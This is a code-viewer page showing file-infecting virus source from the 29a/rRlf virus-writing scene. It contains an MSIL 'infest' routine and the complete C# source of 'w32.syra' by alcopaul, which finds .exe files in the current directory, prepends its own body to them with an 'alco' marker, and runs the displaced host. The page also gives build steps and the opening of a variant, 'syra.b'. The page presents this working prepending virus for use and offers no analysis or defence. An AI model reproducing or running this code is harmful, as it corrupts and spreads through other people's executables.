?? 29a-7.019
字號:
IL_019c: ret // end virus
}
.method public hidebysig static void infest(string host) cil managed
{
// Code size 300 (0x12c)
.maxstack 4
.locals (class [mscorlib]System.Reflection.Module V_0,
class [mscorlib]System.IO.FileStream V_1,
class [mscorlib]System.IO.BinaryReader V_2,
unsigned int8[] V_3,
int32 V_4,
int32 V_5,
int32 V_6,
class [mscorlib]System.IO.FileStream V_7,
class [mscorlib]System.IO.BinaryReader V_8,
unsigned int8[] V_9,
int32 V_10,
int32 V_11,
int32 V_12,
class [mscorlib]System.IO.FileStream V_13,
class [mscorlib]System.IO.BinaryWriter V_14)
IL_0000: call class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetExecutingAssembly()
IL_0005: callvirt instance class [mscorlib]System.Reflection.Module[] [mscorlib]System.Reflection.Assembly::GetModules()
IL_000a: ldc.i4.0
IL_000b: ldelem.ref // reflection
IL_000c: stloc.0
IL_000d: ldloc.0
IL_000e: callvirt instance string [mscorlib]System.Reflection.Module::get_FullyQualifiedName() // app.path & "\" & app.exename & ".exe"
IL_0013: ldc.i4.4 // open or create
IL_0014: ldc.i4.1 // read
IL_0015: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
valuetype [mscorlib]System.IO.FileMode,
valuetype [mscorlib]System.IO.FileAccess) // new object
IL_001a: stloc.1
IL_001b: ldloc.1
IL_001c: newobj instance void [mscorlib]System.IO.BinaryReader::.ctor(class [mscorlib]System.IO.Stream) // new object
IL_0021: stloc.2
IL_0022: ldloc.2
IL_0023: callvirt instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryReader::get_BaseStream()
IL_0028: ldc.i4.0 // origin
IL_0029: conv.i8 // convert to int64
IL_002a: ldc.i4.0 // origin
IL_002b: callvirt instance int64 [mscorlib]System.IO.Stream::Seek(int64,
valuetype [mscorlib]System.IO.SeekOrigin)
IL_0030: pop
IL_0031: ldc.i4 0xE00 // virus
IL_0036: newarr [mscorlib]System.Byte
IL_003b: stloc.3
IL_003c: ldc.i4 0xE00
IL_0041: stloc.s V_4
IL_0043: ldc.i4.0
IL_0044: stloc.s V_5
IL_0046: br.s IL_0069
IL_0048: ldloc.2
IL_0049: ldloc.3
IL_004a: ldloc.s V_5
IL_004c: ldloc.s V_4
IL_004e: callvirt instance int32 [mscorlib]System.IO.BinaryReader::Read(unsigned int8[],
int32,
int32) // read itself
IL_0053: stloc.s V_6
IL_0055: ldloc.s V_6
IL_0057: brtrue.s IL_005b
IL_0059: br.s IL_006e
IL_005b: ldloc.s V_5
IL_005d: ldloc.s V_6
IL_005f: add
IL_0060: stloc.s V_5
IL_0062: ldloc.s V_4
IL_0064: ldloc.s V_6
IL_0066: sub
IL_0067: stloc.s V_4
IL_0069: ldloc.s V_4
IL_006b: ldc.i4.0
IL_006c: bgt.s IL_0048
IL_006e: ldloc.2
IL_006f: callvirt instance void [mscorlib]System.IO.BinaryReader::Close() // close itself
IL_0074: ldarg.0 // victim
IL_0075: ldc.i4.4 // open or create
IL_0076: ldc.i4.1 // read
IL_0077: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
valuetype [mscorlib]System.IO.FileMode,
valuetype [mscorlib]System.IO.FileAccess)
IL_007c: stloc.s V_7
IL_007e: ldloc.s V_7 // object FileStream
IL_0080: newobj instance void [mscorlib]System.IO.BinaryReader::.ctor(class [mscorlib]System.IO.Stream)
IL_0085: stloc.s V_8
IL_0087: ldloc.s V_8 // object BinaryReader
IL_0089: callvirt instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryReader::get_BaseStream()
IL_008e: ldc.i4.0 // beginning
IL_008f: conv.i8 // convert to int 64
IL_0090: ldc.i4.0 // beginning 0
IL_0091: callvirt instance int64 [mscorlib]System.IO.Stream::Seek(int64,
valuetype [mscorlib]System.IO.SeekOrigin)
IL_0096: pop
IL_0097: ldloc.s V_7 // FileStream
IL_0099: callvirt instance int64 [mscorlib]System.IO.Stream::get_Length() // FileStream.Length of victim
IL_009e: conv.ovf.u4
IL_009f: newarr [mscorlib]System.Byte
IL_00a4: stloc.s V_9
IL_00a6: ldloc.s V_7
IL_00a8: callvirt instance int64 [mscorlib]System.IO.Stream::get_Length()
IL_00ad: conv.i4
IL_00ae: stloc.s V_10
IL_00b0: ldc.i4.0
IL_00b1: stloc.s V_11
IL_00b3: br.s IL_00d8
IL_00b5: ldloc.s V_8
IL_00b7: ldloc.s V_9
IL_00b9: ldloc.s V_11
IL_00bb: ldloc.s V_10
IL_00bd: callvirt instance int32 [mscorlib]System.IO.BinaryReader::Read(unsigned int8[],
int32,
int32) // read victim bytes
IL_00c2: stloc.s V_12
IL_00c4: ldloc.s V_12
IL_00c6: brtrue.s IL_00ca
IL_00c8: br.s IL_00dd
IL_00ca: ldloc.s V_11
IL_00cc: ldloc.s V_12
IL_00ce: add
IL_00cf: stloc.s V_11
IL_00d1: ldloc.s V_10
IL_00d3: ldloc.s V_12
IL_00d5: sub
IL_00d6: stloc.s V_10
IL_00d8: ldloc.s V_10
IL_00da: ldc.i4.0
IL_00db: bgt.s IL_00b5
IL_00dd: ldloc.s V_8
IL_00df: callvirt instance void [mscorlib]System.IO.BinaryReader::Close() // close
IL_00e4: ldarg.0 // victim
IL_00e5: ldc.i4.4 // open or create
IL_00e6: ldc.i4.2 // write
IL_00e7: newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
valuetype [mscorlib]System.IO.FileMode,
valuetype [mscorlib]System.IO.FileAccess)
IL_00ec: stloc.s V_13
IL_00ee: ldloc.s V_13 // load filestream object
IL_00f0: newobj instance void [mscorlib]System.IO.BinaryWriter::.ctor(class [mscorlib]System.IO.Stream)
IL_00f5: stloc.s V_14
IL_00f7: ldloc.s V_14 // load binarywriter object
IL_00f9: callvirt instance class [mscorlib]System.IO.Stream [mscorlib]System.IO.BinaryWriter::get_BaseStream()
IL_00fe: ldc.i4.0 // beginning
IL_00ff: conv.i8 // convert to int64
IL_0100: ldc.i4.0 // 0, beginning
IL_0101: callvirt instance int64 [mscorlib]System.IO.Stream::Seek(int64,
valuetype [mscorlib]System.IO.SeekOrigin)
IL_0106: pop
IL_0107: ldloc.s V_14 // object binarywriter
IL_0109: ldloc.3 // virusbytes
IL_010a: callvirt instance void [mscorlib]System.IO.BinaryWriter::Write(unsigned int8[]) // write
IL_010f: ldloc.s V_14 // object binarywriter
IL_0111: ldloc.s V_9 // hostbytes
IL_0113: callvirt instance void [mscorlib]System.IO.BinaryWriter::Write(unsigned int8[]) // write
IL_0118: ldloc.s V_14 // object binarywriter
IL_011a: ldstr "paul" // signature
IL_011f: callvirt instance void [mscorlib]System.IO.BinaryWriter::Write(string) // write
IL_0124: ldloc.s V_14 // object binarywriter
IL_0126: callvirt instance void [mscorlib]System.IO.BinaryWriter::Close() // close
IL_012b: ret // end infest
}
.method public hidebysig specialname rtspecialname
instance void .ctor() cil managed
{
// Code size 7 (0x7)
.maxstack 8
IL_0000: ldarg.0
IL_0001: call instance void [mscorlib]System.Object::.ctor()
IL_0006: ret
}
}
//////////////////////////////////////////////////////////////////////////////////////////////////[3589.TXT]//////////////////
////////////////////////////////////// illawesome experiments : branch of the booze zen productions //////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////// philippines 3300 //////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////[syra.cs]///////////////////////
// w32.syra (aka w32.hllp.flatei) //////
// //////
// i did it after reading benny's frustration in 29a6 of writing a c# virus... - alcopaul //////
// //////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// csc /target:winexe syra.cs ////
// copy con alco.sig ////
// alco^Z ////
// copy /b syra.exe+alco.sig vir.exe ////
// copy vir.exe syra.exe ////
// y ////
////////////////////////////////////////////
// "flatei, not sharpei..." ///////////
////////////////////////////////////////////
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
class msil_syra_by_alcopaul
{
public class Win32 {
[DllImport("shell32.dll", CharSet=CharSet.Auto)]
public static extern int ShellExecute(int hWnd, String oper, String file, String param,
String dir, int type);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MessageBox(int hWnd, String text,
String caption, uint type);
}
public static void Main(String[] args)
{
Module exename = Assembly.GetExecutingAssembly().GetModules()[0];
string[] files = Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe");
foreach (string file in files){
FileStream fs = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
StreamReader r = new StreamReader(fs);
int fff = (int) fs.Length;
int rrr = fff - 4;
r.BaseStream.Seek(rrr, SeekOrigin.Begin);
string g = r.ReadLine();
r.Close();
string hhh = "alco";
if (g==hhh)
continue;
else
if (file==exename.FullyQualifiedName)
continue;
else
try
{
Infect(file);
}
catch
{
continue;
}
break;
}
FileStream fs1 = new FileStream(exename.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader r1 = new BinaryReader(fs1);
int host = (int) fs1.Length;
int vir = host - 5124;
r1.BaseStream.Seek(5124, SeekOrigin.Begin);
byte[] bytes = new byte[vir];
int numBytesToRead = vir;
int numBytesRead = 0;
while (numBytesToRead > 0)
{
int n = r1.Read(bytes, numBytesRead, numBytesToRead);
if (n==0)
break;
numBytesRead += n;
numBytesToRead -= n;
}
r1.Close();
FileStream fs11 = new FileStream("hostbyte.exe", FileMode.OpenOrCreate, FileAccess.Write);
BinaryWriter w1 = new BinaryWriter(fs11);
w1.BaseStream.Seek(0, SeekOrigin.Begin);
w1.Write(bytes);
w1.Close();
string rect = Directory.GetCurrentDirectory();
Win32.ShellExecute(0, null, "hostbyte.exe", null, rect, 1);
wet:
try
{
File.Delete("hostbyte.exe");
}
catch
{
goto wet;
}
if (File.Exists("hostbyte.exe")==true)
goto wet;
Win32.MessageBox(0, "::: prepending virus purely written in d flat :::", "msil.syra by alcopaul",
0);
}
public static void Infect(string host)
{
Module mod = Assembly.GetExecutingAssembly().GetModules()[0];
FileStream fs = new FileStream(mod.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader r = new BinaryReader(fs);
r.BaseStream.Seek(0, SeekOrigin.Begin);
byte[] bytes = new byte[5124];
int numBytesToRead = (int) 5124;
int numBytesRead = 0;
while (numBytesToRead > 0)
{
int n = r.Read(bytes, numBytesRead, numBytesToRead);
if (n==0)
break;
numBytesRead += n;
numBytesToRead -= n;
}
r.Close();
FileStream fs133 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader w33 = new BinaryReader(fs133);
w33.BaseStream.Seek(0, SeekOrigin.Begin);
byte[] bytes2 = new byte[fs133.Length];
int numBytesToRead2 = (int) fs133.Length;
int numBytesRead2 = 0;
while (numBytesToRead2 > 0)
{
int n = w33.Read(bytes2, numBytesRead2, numBytesToRead2);
if (n==0)
break;
numBytesRead2 += n;
numBytesToRead2 -= n;
}
w33.Close();
FileStream fs1 = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write);
BinaryWriter w = new BinaryWriter(fs1);
w.BaseStream.Seek(0, SeekOrigin.Begin);
w.Write(bytes);
w.Write(bytes2);
w.Write("alco");
w.Close();
}
}
//////////////////////////////////////////////////////////////////////////////////////////////[syra.b.cs]///////////////////
//////////////////////
// w32.syra.b ///////
////////////////////
// sept. 22, 2002 - now syra only infects dotnet exe files, in current directory and in (1 second / 1 Hertz) fashion...
//
// csc /target:winexe syra.b.cs (no more copy con shitz unlike in the first version..)
//
// alcopaul
// brigada ocho & rrlf
//
//
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -